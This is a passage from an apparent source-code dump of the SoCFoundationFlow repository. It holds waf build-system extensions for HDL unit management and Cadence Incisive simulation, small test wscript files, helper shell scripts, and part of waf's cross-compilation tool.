True\n\n def unpack(self, ctx):\n self.ctx = ctx\n self.script = ctx.path.make_node(self.script)\n self._k.unpack(self)\n for view in self._v:\n self._v[view].unpack(self)\n self._packed = False\n\n def use(self, key):\n if key == 'includes':\n nodes = set()\n if self.synu_deps:\n for u in self.synu_deps:\n nodes.update(u.use('_includes'))\n if self.use('_includes'):\n nodes.update(self.use('_includes'))\n if nodes:\n return nodes\n else:\n raise SFFerrors.Error(\"Key includes not set\")\n elif key == 'tb_includes':\n nodes = set()\n if self.simu_deps:\n for u in self.simu_deps:\n nodes.update(u.use('_tb_includes'))\n if self.use('_tb_includes'):\n nodes.update(self.use('_tb_includes'))\n if self.use('includes'):\n nodes.update(self.use('includes'))\n if nodes:\n return nodes\n else:\n raise SFFerrors.Error(\"Key includes not set\")\n else:\n return self._k.use(key)\n\n def get(self, key):\n return self._k.get(key)\n\n def add(self, key, thing):\n self._k.add(key, thing)\n\n def set_deps(self, synu, simu):\n self.synu_deps = synu\n self.simu_deps = simu\n\n@conf\nclass SFFView():\n \"\"\"\n NEW PLAN:\n Hold the user settings from the file.\n On-the-fly generate what is asked using those to drive the algo. Forget\n caching them in dicts or anything like that.\n \"\"\"\n\n def __init__(self, unit, **kwargs):\n self.unit = unit\n self._k = {}\n\n for key,val in kwargs.items():\n self._k[key] = SFFutil.strtolist(val)\n\n def __repr__(self):\n key_str = ''\n for key in self._validkeys:\n key_str += str(key) + ': ' + str(self.use(key)) + '\\n'\n return (\"SFFView contents:\\n\" + key_str)\n\n _validkeys = ('name','unit_top','use','src_dir','src','_includes',\n 'tb_dir','tb_src','_tb_includes','tb','tb_use')\n\n def check(self):\n for key in self._validkeys:\n self.use(key)\n\n def keys(self):\n return self._k.keys()\n\n def validkeys(self):\n return self._validkeys\n\n def get(self, k):\n return self._k.get(k)\n\n def add(self, k, thing):\n self._k[k] = thing\n\n def extend(self, k, thing):\n self._k[k].extend(thing)\n\n def use(self, key):\n hdl_ext = []\n hdl_ext += self.unit.ctx.env.VLOG_EXT\n hdl_ext += self.unit.ctx.env.SVLOG_EXT\n hdl_ext += self.unit.ctx.env.VHDL_EXT\n\n if key == 'name':\n return [self.unit.name]\n if key == 'unit_top':\n if self.get(key):\n return self.get(key)\n else:\n return self.use('name')\n if key == 'use':\n return self.get(key)\n if key == 'tb_use':\n return self.get(key)\n if key == 'src':\n nodes = set()\n if self.get('src'):\n nodes.update(self._getnodes(self.get('src'), False))\n if self.get('src_dir'):\n nodes.update(self._searchnodes(self.get('src_dir'), hdl_ext,\n False)[0])\n else:\n nodes.update(self._searchnodes(['src'], hdl_ext)[0])\n return nodes\n if key == 'src_dir':\n nodes = set()\n if self.get('src_dir'):\n nodes.update(self._getnodes(self.get('src_dir'), False))\n else:\n nodes.update(self._getnodes(['src']))\n return nodes\n if key == 'tb_src':\n nodes = set()\n if self.get('tb_src'):\n nodes.update(self._getnodes(self.get('tb_src'), False))\n if self.get('tb_dir'):\n nodes.update(self._searchnodes(self.get('tb_dir'), hdl_ext,\n False)[0])\n else:\n nodes.update(self._searchnodes(['tb'], hdl_ext)[0])\n return nodes\n if key == 'tb_dir':\n nodes = set()\n if self.get('tb_dir'):\n nodes.update(self._getnodes(self.get('tb_dir'), False))\n else:\n nodes.update(self._getnodes(['tb']))\n return nodes\n if key == '_includes':\n nodes = set()\n if self.get('includes'):\n nodes.update(self._getnodes(self.get('includes'), False))\n else:\n nodes.update(self.use('src_dir'))\n return nodes\n if key == '_tb_includes':\n nodes = set()\n if self.get('tb_includes'):\n nodes.update(self._getnodes(self.get('tb_includes'), False))\n else:\n nodes.update(self.use('src_dir'))\n nodes.update(self.use('tb_dir'))\n return nodes\n if key == 'tb':\n if self.get('tb'):\n return self.get('tb')\n else:\n return ['tb_'+self.use('name')[0]]\n else:\n raise SFFerrors.Error(\"Key {0} not understood\".format(key))\n\n def _getnodes(self, list_, silentfail=True):\n nodes = set()\n dir_ = self.unit.script.parent\n for name in list_:\n n = dir_.find_node(name)\n if n in nodes:\n raise SFFerrors.Error(\"File or dir: {0} already specified\"\n .format(dir_.srcpath() + '/' + name))\n elif n is not None:\n nodes.add(n)\n elif not silentfail:\n raise SFFerrors.Error(\"File or dir: {0} not found\"\n .format(dir_.srcpath() + '/' + name))\n return nodes\n\n def _searchnodes(self, list_, ext='.*', silentfail=True):\n #Try to create node before search!\n dirnodes = set()\n for d in list_:\n node = self.unit.script.parent.find_node(d)\n if node:\n dirnodes.add(node)\n elif not silentfail:\n raise SFFerrors.Error(\"Directory {0} not found\".format(d))\n\n filenodes = set()\n dirnodeswithsrc = set()\n\n for d in dirnodes:\n new_files = []\n for e in ext:\n new_files += d.ant_glob('**/*{0}'.format(e))\n for n in new_files:\n filenodes.add(n)\n if new_files:\n dirnodeswithsrc.add(d)\n else:\n if not silentfail:\n raise SFFerrors.Error((\"Directory {0} contained no sources \"\n \"ending in: {1}\".format(d, ext)))\n\n return filenodes,dirnodeswithsrc\n\n def pack(self):\n delattr(self, 'unit')\n pass #self.unit = self.unit.abspath()\n\n def unpack(self, unit):\n self.unit = unit\n pass\n\n@conf\ndef setup_hdl_module(self, *args, **kwargs):\n self.msg('SFFUnits.setup_hdl_module() depreciated', ('Replace with '\n 'SFFUnits.add()'), color='YELLOW')\n self.SFFUnits.add(*args, **kwargs)\n\ndef load_SFFUnits(ctx):\n new_SFFUnits = pickle.loads(ctx.env['SFFUnits'])\n new_SFFUnits.ctx = ctx\n new_SFFUnits.unpack(ctx)\n return new_SFFUnits\n\nimport re, sys, os\ndef SFF_verilog_scan(task):\n \"\"\"\n scan for dependencies using the Veripool vppreprocessor tool. Execute the\n preprocessor using the includes and collect the output. Then grep it for\n `line directives, extract the file name and add to a set to eliminate\n duplicates. Then convert the list to nodes and return.\n \"\"\"\n env = task.env\n gen = task.generator\n bld = gen.bld\n wd = bld.bldnode.abspath()\n exec_env = {}\n cmd = []\n cmd.extend(['vppreproc'])\n #Ugly hack here as includes are not propagated into the task\n if(hasattr(gen, 'includes')):\n includes = [a.path_from(bld.bldnode) for a in gen.includes]\n for include in includes:\n cmd.extend(['-y',include])\n files = [a.path_from(bld.bldnode) for a in task.inputs]\n cmd += files\n\n (out,err) = bld.cmd_and_log(cmd, cwd=bld.variant_dir, output=Context.BOTH,\n quiet=Context.STDOUT)\n\n #Match the `line directives\n lst_src = []\n seen = set([])\n line_det = re.compile(r'`line.*\"(.*)\"')\n for x in Utils.to_list(line_det.findall(out)):\n if x in files:\n seen.add(x)\n if x in seen or not x:\n continue\n seen.add(x)\n if os.path.isabs(x):\n lst_src.append(bld.root.make_node(x) or x)\n else:\n p = bld.path.get_bld().make_node(x)\n lst_src.append(p)\n return (lst_src, [])\n\n\n"
},
{
"alpha_fraction": 0.6727272868156433,
"alphanum_fraction": 0.6727272868156433,
"avg_line_length": 26,
"blob_id": "93fa19fe38a48f69fb2ecb23adefa2abfebd6e0f",
"content_id": "1d4ffe54b111743ab5c90c7dba73bb961d03c752",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 55,
"license_type": "permissive",
"max_line_length": 33,
"num_lines": 2,
"path": "/waf_test/RTL_compiler/basic/dual_uart/wscript",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "\ndef configure(ctx):\n ctx.SFFUnits.add('dual_uart')\n"
},
{
"alpha_fraction": 0.6260504126548767,
"alphanum_fraction": 0.6302521228790283,
"avg_line_length": 18.75,
"blob_id": "c6feb89b4d04e6561e57dbeb39ae22bfe04b593a",
"content_id": "9fc7058254a0083b330736150e1720cfc5e3b89b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 238,
"license_type": "permissive",
"max_line_length": 34,
"num_lines": 12,
"path": "/waf_test/basic_modules/wscript",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n# encoding: utf-8\n\ndef configure(ctx):\n ctx.recurse('include_only')\n ctx.recurse('src_only')\n ctx.recurse('tb_include_only')\n ctx.recurse('tb_only')\n ctx.recurse('two_src')\n\ndef build(ctx):\n pass\n\n"
},
{
"alpha_fraction": 0.5045045018196106,
"alphanum_fraction": 0.5315315127372742,
"avg_line_length": 18.600000381469727,
"blob_id": "28dc0ee95d8635edd2a7f865bac06951faa30105",
"content_id": "d96fb439f80cee426c8560b3cdf66c45a0851736",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 222,
"license_type": "permissive",
"max_line_length": 37,
"num_lines": 10,
"path": "/waf_test/basic_dependencies/wscript",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": " \ndef configure(ctx):\n ctx.recurse('l1')\n ctx.recurse('l2')\n ctx.recurse('l2_5')\n ctx.recurse('l3')\n ctx.recurse('l4')\n ctx.recurse('basic_dependencies')\n\ndef build(ctx):\n pass\n\n\n \n \n"
},
{
"alpha_fraction": 0.5670395493507385,
"alphanum_fraction": 0.5723826885223389,
"avg_line_length": 31.021390914916992,
"blob_id": "b16c8bb3d623d74a4522d2284c5fc2c6f8b4e691",
"content_id": "62ac6459fc821cc20a4bc35cc69fb0a8ec12cdc7",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5989,
"license_type": "permissive",
"max_line_length": 152,
"num_lines": 187,
"path": "/admin/waf/waf-extensions/SFFincisive.py",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n# encoding: utf-8\n# Matthew Swabey, 2015\n\n\"\"\"\nClasses and helper functions used to provide\n\"sim_source\"\n\"verify_source\"\nvia the Cadence Incisive Suite.\n\nTODO: Read book section 8.4.3\n1) Create tasks using taskgen\n2) Create function to prep strings and includes\n3) Try to use the examples to find the files created by ncvlog inside the lib dir and add it to the deps to get proper dependency tracking and cleaning.\n\"\"\"\n\nfrom waflib import Context\nfrom waflib import Build\nfrom waflib import Logs\nfrom waflib import Node\nfrom waflib import TaskGen\nfrom waflib import Task\nfrom waflib import Utils\nfrom waflib.Configure import conf\nfrom waflib.TaskGen import feature, before_method, after_method\nimport pickle\nimport os,sys\nfrom SFFbuildmgr import SFF_verilog_scan\nfrom SFFbuildmgr import SFFUnitsCont, SFFUnit, SFFView, load_SFFUnits\n\ndef configure(ctx):\n \"\"\"\n Incisive: Find all the necessary parts of the Incisive Simulator.\n \"\"\"\n ctx.find_program('ncvlog')\n ctx.find_program('ncvhdl')\n ctx.find_program('ncsim')\n ctx.find_program('ncelab')\n\ndef _simulate(ctx, gui):\n \"\"\"\n Load the SFFUnits into the system.\n Create the necessary tasks to build the simulation libs\n Create a toplevel CDS.lib and hdl.var with the mappings for all the\n libraries and deps.\n Kick ncelab targetting the testbench\n Kick ncsim targetting the testbench\n \"\"\"\n ctx.env['SFFUnits'] = load_SFFUnits(ctx)\n\n #units_taskgen(ctx)\n \"\"\"\n Creates the directory path and nodes in the build directory.\n Creates the testbench library separately\n Creates a taskgen from each other library in units_hdl\n \"\"\"\n\n top = ctx.env['SFFUnits'].getunit(ctx.env.top_level)\n\n for u in top.synu_deps + top.simu_deps:\n lib = u.script.parent.get_bld().make_node(u.name+'_nclib')\n lib.mkdir()\n u.b['nclib'] = lib\n\n if u.use('use'):\n tsk = IncisiveTask(\n name=u.name,\n target=lib,\n source=u.use('src'),\n includes=u.use('includes'),\n after=u.use('use'),\n output=lib,\n scan=SFF_verilog_scan,\n env=ctx.env)\n ctx.add_to_group(tsk)\n else:\n tsk = IncisiveTask(\n name=u.name,\n target=lib,\n source=u.use('src'),\n output=lib,\n includes=u.use('includes'),\n scan=SFF_verilog_scan,\n env=ctx.env)\n ctx.add_to_group(tsk)\n\n\n \"\"\"\n Create the testbench taskgen last as it is always at the top dep\n \"\"\"\n tb_lib = top.script.parent.get_bld().make_node(top.use('tb')[0]+'_nclib')\n tb_lib.mkdir()\n top.b['tbnclib'] = tb_lib\n\n tsk = IncisiveTask(\n name=top.use('tb'),\n target=tb_lib,\n source=top.use('tb_src'),\n output=tb_lib,\n includes=top.use('tb_includes'),\n after=ctx.env.top_level,\n scan=SFF_verilog_scan,\n env=ctx.env )\n ctx.add_to_group(tsk)\n \"\"\"\n Create the cds.lib and hdl.var in the toplevel of the build directory with\n the testbench defined in cds.lib and as WORKLIB in hdl.var.\n \"\"\"\n build_cds_lib_file(ctx)\n build_hdl_var_file(ctx)\n\n top = ctx.env['SFFUnits'].getunit(ctx.env.top_level)\n #Run ncelab\n ctx(name='ncelab',\n rule='${NCELAB} -timescale ''1ns/10ps'' -access rwc %s' % top.use('tb')[0],\n always = True,)\n\n #Run ncsim\n ctx(name='ncsim',\n rule='${NCSIM} %s %s' % (gui,top.use('tb')[0]),\n always = True,\n after='ncelab')\n\nclass IncisiveTask(Task.Task):\n def __init__(self, *k, **kw):\n Task.Task.__init__(self, *k, **kw)\n\n self.dep_vars = ['VLOG_EXT']\n self.dep_vars += ['VHDL_EXT']\n self.dep_vars += ['SVLOG_EXT']\n self.dep_vars += ['SDC_EXT']\n\n self.set_inputs(list(kw['source']))\n self.set_outputs(kw['output'])\n self.includes = kw['includes']\n self.before = ['ncelab','ncsim']\n from types import MethodType\n self.scan = MethodType(kw['scan'],self)\n\n\n def __str__(self):\n return '%s: %s\\n' % (self.__class__.__name__,self.outputs[0])\n\n def run(self):\n src = ''\n for s in self.inputs:\n src += s.bldpath() + ' '\n tgt = self.outputs[0].bldpath()\n incs = ''\n if hasattr(self.generator,'includes'):\n incs = ''\n for inc in getattr(self.generator,'includes'):\n incs += '-incdir ' + inc.bldpath() + ' '\n res = ''\n cmd = '%s -SV -linedebug -work %s %s %s' % (self.env['NCVLOG'][0], self.outputs[0],\n incs, src)\n return self.exec_command(cmd)\n\n\ndef build_cds_lib_file(ctx):\n top = ctx.env['SFFUnits'].getunit(ctx.env.top_level)\n cds_lib = ctx.path.make_node('cds.lib').get_bld()\n cds_lib.write('DEFINE {0} ./{1}\\n'.format(top.b['tbnclib'],\n top.b['tbnclib'].bldpath()))\n for m in ctx.env['SFFUnits'].units:\n md = ctx.env['SFFUnits'].getunit(m)\n cds_lib.write('DEFINE {0} ./{1}\\n'.format((md.b['nclib']),\n md.b['nclib'].bldpath()), flags='a')\n\ndef build_hdl_var_file(ctx):\n top = ctx.env['SFFUnits'].getunit(ctx.env.top_level)\n hdl_var = ctx.path.make_node('hdl.var').get_bld()\n hdl_var.write('DEFINE WORK {0}\\n'.format(top.b['tbnclib']))\n hdl_var.write('DEFINE LIB_MAP (\\\\\\n', flags='a')\n tb_dir = top.use('tb_dir')\n hdl_var.write('./{0}/... => {1}'.format(tb_dir.pop().bldpath(),\n top.b['tbnclib']), flags='a')\n if tb_dir:\n for d in tb_dir:\n hdl_var.write(',\\\\\\n./{0}/... => {1}'.format(d.bldpath(),\n top.b['nclib']), flags='a')\n for m in ctx.env['SFFUnits'].units:\n md = ctx.env['SFFUnits'].getunit(m)\n for d in md.use('src_dir'):\n hdl_var.write(',\\\\\\n./{0}/... => {1}'.format(d.bldpath(),\n md.b['nclib']), flags='a')\n hdl_var.write(')\\n', flags='a')\n\n"
},
{
"alpha_fraction": 0.6112532019615173,
"alphanum_fraction": 0.6138107180595398,
"avg_line_length": 21.882352828979492,
"blob_id": "a41d921bf440b1714d1f7f73aeef749d512a2cfa",
"content_id": "3849b641a5af701b4f01e159bebf70fda1a1fe54",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 391,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 17,
"path": "/admin/setup_env.bash",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\nif [ -z $SFF_ADMIN ]; then\n rootdir=\"${BASH_SOURCE[0]}\";\n if ([ -h \"${rootdir}\" ]) then\n while([ -h \"${rootdir}\" ]) do rootdir=`readlink \"${rootdir}\"`; done\n fi\n pushd . > /dev/null\n cd `dirname ${rootdir}` > /dev/null\n rootdir=`pwd`;\n popd > /dev/null\nelse\n rootdir=$SFF_ADMIN\nfi\n\nexport PATH=$PATH:$rootdir/waf/waf-current\nexport WAFDIR=$rootdir/waf/waf-current\n\n\n"
},
{
"alpha_fraction": 0.6814159154891968,
"alphanum_fraction": 0.6902654767036438,
"avg_line_length": 54.5,
"blob_id": "5b6f860f99152a1f7cb963b0c15be5aeaeb184d1",
"content_id": "b379d6707626a9f8281aaa89b1cafd35ce8c9e58",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 113,
"license_type": "permissive",
"max_line_length": 90,
"num_lines": 2,
"path": "/waf_test/defaults_n_user/wscript",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "\ndef configure(ctx):\n ctx.SFFUnits.add(src_dir='src2',src='src/defaults.sv',includes='src',tb='tb_defaults')\n\n"
},
{
"alpha_fraction": 0.640625,
"alphanum_fraction": 0.65625,
"avg_line_length": 29.5,
"blob_id": "1bc6de2b2725ac1c6fb6208b3dde43d377d4341e",
"content_id": "df33dea6303d62ba6fefe794b2c83cb8ba9e9ee1",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 64,
"license_type": "permissive",
"max_line_length": 40,
"num_lines": 2,
"path": "/waf_test/basic_modules/two_src/wscript",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "\n\ndef configure(ctx):\n ctx.SFFUnits.add(src_dir='src,src2')\n\n"
},
{
"alpha_fraction": 0.6557376980781555,
"alphanum_fraction": 0.6571038365364075,
"avg_line_length": 22.612903594970703,
"blob_id": "99d2f7827a921c5594850f7481b4a03e3ee75596",
"content_id": "11258827a911867cbe49ddc708b53fcf2c22ed6e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 732,
"license_type": "permissive",
"max_line_length": 54,
"num_lines": 31,
"path": "/waf_test/wscript",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n# encoding: utf-8\n\nimport os\ntoolpath = os.environ['WAFDIR'] + '/../waf-extensions'\n\ntop = '.'\nout = 'build'\n\n\ndef options(ctx):\n ctx.load('SFFbuildmgr', tooldir=toolpath)\n ctx.load('SFFtask', tooldir=toolpath)\n #ctx.load('RTL_compiler', tooldir=toolpath)\n ctx.load('why')\n\ndef configure(ctx):\n ctx.load('SFFbuildmgr', tooldir=toolpath)\n ctx.load('SFFtask', tooldir=toolpath)\n #ctx.load('RTL_compiler', tooldir=toolpath)\n ctx.load('why')\n ctx.recurse('defaults')\n ctx.recurse('defaults_n_user')\n ctx.recurse('basic_modules')\n ctx.recurse('basic_dependencies')\n ctx.recurse('find_src')\n ctx.recurse('basic_views')\n ctx.SFFUnits.finalize()\n\ndef build(ctx):\n pass\n"
},
{
"alpha_fraction": 0.5862069129943848,
"alphanum_fraction": 0.6379310488700867,
"avg_line_length": 27,
"blob_id": "12f82423f7120c0437fb7611679f75eeb8a3bf87",
"content_id": "c01509b240bbf57bec9376aef23fa675cf19b433",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 58,
"license_type": "permissive",
"max_line_length": 35,
"num_lines": 2,
"path": "/waf_test/basic_dependencies/l3/wscript",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "\ndef configure(ctx):\n ctx.SFFUnits.add(use='l2,l2_5')\n\n"
},
{
"alpha_fraction": 0.6225000023841858,
"alphanum_fraction": 0.6299999952316284,
"avg_line_length": 35.3636360168457,
"blob_id": "ebad2e2a80e1fa99d6c52e73578e23bfb1cdb242",
"content_id": "334accf705e2c37f23d116d75d51ad06d830d0d3",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 400,
"license_type": "permissive",
"max_line_length": 128,
"num_lines": 11,
"path": "/waf_test/run_incisive.tcsh",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\ntests=(defaults defaults_n_user basic_dependencies include_only src_only tb_include_only tb_only two_src find_src basic_views)\n\nfor ((i = 0; i < ${#tests[@]}; i++)); do\n printf \"\\nRunning: ${tests[$i]} \\n\"\n printf \"waf configure --top_level=${tests[$i]} verify_source\\n\"\n eval \"waf configure --top_level=${tests[$i]} verify_source\"\n if [ $? -ne 0 ]; then exit 1; fi\n\ndone\n"
},
{
"alpha_fraction": 0.6226415038108826,
"alphanum_fraction": 0.6415094137191772,
"avg_line_length": 24.5,
"blob_id": "054bb9725b687d6d9bcbad56d8e37f0387ec3fe5",
"content_id": "0f1d67b000adf422f2babc5d16e0d30cc0df03e4",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 53,
"license_type": "permissive",
"max_line_length": 30,
"num_lines": 2,
"path": "/waf_test/basic_dependencies/l2_5/wscript",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "\ndef configure(ctx):\n ctx.SFFUnits.add(use='l1')\n\n"
},
{
"alpha_fraction": 0.7233009934425354,
"alphanum_fraction": 0.7233009934425354,
"avg_line_length": 33.16666793823242,
"blob_id": "e615d57118ef7e2459f45e3be668769968be883a",
"content_id": "229b5f33275238016f0c44dc180acb4207890d0e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 206,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 6,
"path": "/waf_test/basic_views/wscript",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "# This test attaches the meaningless kwarg bar into the views for tracking\n# purposes only.\n\ndef configure(ctx):\n ctx.SFFUnits.add(bar='default')\n ctx.SFFUnits.addview('basic_views','foo',bar='foo')\n\n"
},
{
"alpha_fraction": 0.6727272868156433,
"alphanum_fraction": 0.6727272868156433,
"avg_line_length": 25.5,
"blob_id": "e945211fadb018838be20856c31bdbec6222ba98",
"content_id": "040962860e0b27c6b4bd3d67bc73497debf085d3",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 55,
"license_type": "permissive",
"max_line_length": 32,
"num_lines": 2,
"path": "/waf_test/defaults/wscript",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "\ndef configure(ctx):\n ctx.SFFUnits.add('defaults')\n\n"
},
{
"alpha_fraction": 0.5544747114181519,
"alphanum_fraction": 0.561284065246582,
"avg_line_length": 35.71428680419922,
"blob_id": "00f3655cbb6864704905c5c84454b63f16f60dd0",
"content_id": "d1289360960f7a855214c491fbf854b0c106e0f5",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1028,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 28,
"path": "/admin/waf/waf-extensions/SFFutil.py",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "from waflib import Errors\nfrom waflib import Node\nimport SFFerrors\n\ndef strtolist(string_or_list):\n if isinstance(string_or_list, str):\n return [s.strip() for s in string_or_list.split(',')]\n elif isinstance(string_or_list, (list, set)):\n return string_or_list\n raise SFFerrors.Error(\n (\"strtolist passed type: '{0}' instead of str or list\")\n .format(type(string_or_list)))\n \ndef list2nodes(self, subdir, list_, silent_fail):\n nodes = set()\n for file_ in list_:\n n = subdir.find_node(file_) \n if n in nodes:\n raise Errors.ConfigurationError(\n \"'{0}': Node '{1}' already exits in list '{2}'.\".format(\n self.name, subdir.srcpath() + '/' + n, list_))\n elif n is not None:\n nodes.add(n)\n elif not silent_fail:\n raise Errors.ConfigurationError(\n \"'{0}': Failed to find '{1}' on disk.\".format(\n self.name, subdir.srcpath() + '/' + node))\n return nodes\n"
},
{
"alpha_fraction": 0.6600000262260437,
"alphanum_fraction": 0.6600000262260437,
"avg_line_length": 23.5,
"blob_id": "98956fa15ce836139d336435d4dd5734aa72a0f8",
"content_id": "bb999b46ec00bc6c532db262ae6b5a548dd92f65",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 50,
"license_type": "permissive",
"max_line_length": 28,
"num_lines": 2,
"path": "/waf_test/RTL_compiler/basic/uart/wscript",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "\ndef configure(ctx):\n ctx.SFFUnits.add('uart')\n"
},
{
"alpha_fraction": 0.644444465637207,
"alphanum_fraction": 0.644444465637207,
"avg_line_length": 20.5,
"blob_id": "0f81246c5f319803f452275f45f655bcbb40f1c7",
"content_id": "cc8040b7c5b7a713edeb9739ee2168c8fc004e0c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 45,
"license_type": "permissive",
"max_line_length": 22,
"num_lines": 2,
"path": "/waf_test/find_src/wscript",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "\ndef configure(ctx):\n ctx.SFFUnits.add()\n\n"
},
{
"alpha_fraction": 0.6641749739646912,
"alphanum_fraction": 0.6672203540802002,
"avg_line_length": 23.079999923706055,
"blob_id": "a957ce0371b2d386e555d08d51aeb8652577404d",
"content_id": "948782436a31c78ae44f64658e60b22d9df4e115",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3612,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 150,
"path": "/admin/waf/waf-1.8.14/waflib/extras/cfg_cross_gnu.py",
"repo_name": "JohnSkubic/SoCFoundationFlow",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n# -*- coding: utf-8 vi:ts=4:noexpandtab\n# Tool to provide dedicated variables for cross-compilation\n\n__author__ = __maintainer__ = \"Jérôme Carretero <[email protected]>\"\n__copyright__ = \"Jérôme Carretero, 2014\"\n\n\"\"\"\n\nThis tool allows to use environment variables to define cross-compilation things,\nmostly used when you use build variants.\n\nUsage:\n\n- In your build script::\n\n def configure(cfg):\n ...\n conf.load('c_cross_gnu')\n for variant in x_variants:\n conf.xcheck_host()\n conf.xcheck_host_var('POUET')\n ...\n\n ...\n\n- Then::\n\n CHOST=arm-hardfloat-linux-gnueabi waf configure\n\n env arm-hardfloat-linux-gnueabi-CC=\"clang -...\" waf configure\n\n CFLAGS=... CHOST=arm-hardfloat-linux-gnueabi HOST_CFLAGS=-g waf configure\n\n HOST_CC=\"clang -...\" waf configure\n\n\"\"\"\n\nimport os\nfrom waflib import Utils, Configure\n\ntry:\n\tfrom shlex import quote\nexcept ImportError:\n\tfrom pipes import quote\n\[email protected]\ndef xcheck_prog(conf, var, tool, cross=False):\n\tvalue = os.environ.get(var, '')\n\tvalue = Utils.to_list(value)\n\n\tif not value:\n\t\treturn\n\n\tconf.env[var] = value\n\tif cross:\n\t\tpretty = 'cross-compilation %s' % var\n\telse:\n\t\tpretty = var\n\tconf.msg('Will use %s' % pretty,\n\t \" \".join(quote(x) for x in value))\n\[email protected]\ndef xcheck_envar(conf, name, wafname=None, cross=False):\n\twafname = wafname or name\n\tvalue = os.environ.get(name, None)\n\tvalue = Utils.to_list(value)\n\n\tif not value:\n\t\treturn\n\n\tconf.env[wafname] += value\n\tif cross:\n\t\tpretty = 'cross-compilation %s' % wafname\n\telse:\n\t\tpretty = wafname\n\tconf.msg('Will use %s' % pretty,\n\t \" \".join(quote(x) for x in value))\n\[email protected]\ndef xcheck_host_prog(conf, name, tool, wafname=None):\n\twafname = wafname or name\n\thost = conf.env.CHOST\n\tspecific = None\n\tif host:\n\t\tspecific = os.environ.get('%s-%s' % (host[0], name), None)\n\n\tif specific:\n\t\tvalue = Utils.to_list(specific)\n\t\tconf.env[wafname] += value\n\t\tconf.msg('Will use cross-compilation %s' % name,\n\t\t \" \".join(quote(x) for x in value))\n\t\treturn\n\n\tconf.xcheck_prog('HOST_%s' % name, tool, cross=True)\n\n\tif conf.env[wafname]:\n\t\treturn\n\n\tvalue = None\n\tif host:\n\t\tvalue = '%s-%s' % (host[0], tool)\n\n\tif value:\n\t\tconf.env[wafname] = value\n\t\tconf.msg('Will use cross-compilation %s' % wafname, value)\n\[email protected]\ndef xcheck_host_envar(conf, name, wafname=None):\n\twafname = wafname or name\n\n\thost = conf.env.CHOST\n\tspecific = None\n\tif host:\n\t\tspecific = os.environ.get('%s-%s' % (host[0], name), None)\n\n\tif specific:\n\t\tvalue = Utils.to_list(specific)\n\t\tconf.env[wafname] += value\n\t\tconf.msg('Will use cross-compilation %s' % name,\n\t\t \" \".join(quote(x) for x in value))\n\t\treturn\n\n\tconf.xcheck_envar('HOST_%s' % name, wafname, cross=True)\n\n\[email protected]\ndef xcheck_host(conf):\n\tconf.xcheck_envar('CHOST', cross=True)\n\tconf.xcheck_host_prog('CC', 'gcc')\n\tconf.xcheck_host_prog('CXX', 'g++')\n\tconf.xcheck_host_prog('LINK_CC', 'gcc')\n\tconf.xcheck_host_prog('LINK_CXX', 'g++')\n\tconf.xcheck_host_prog('AR', 'ar')\n\tconf.xcheck_host_prog('AS', 'as')\n\tconf.xcheck_host_prog('LD', 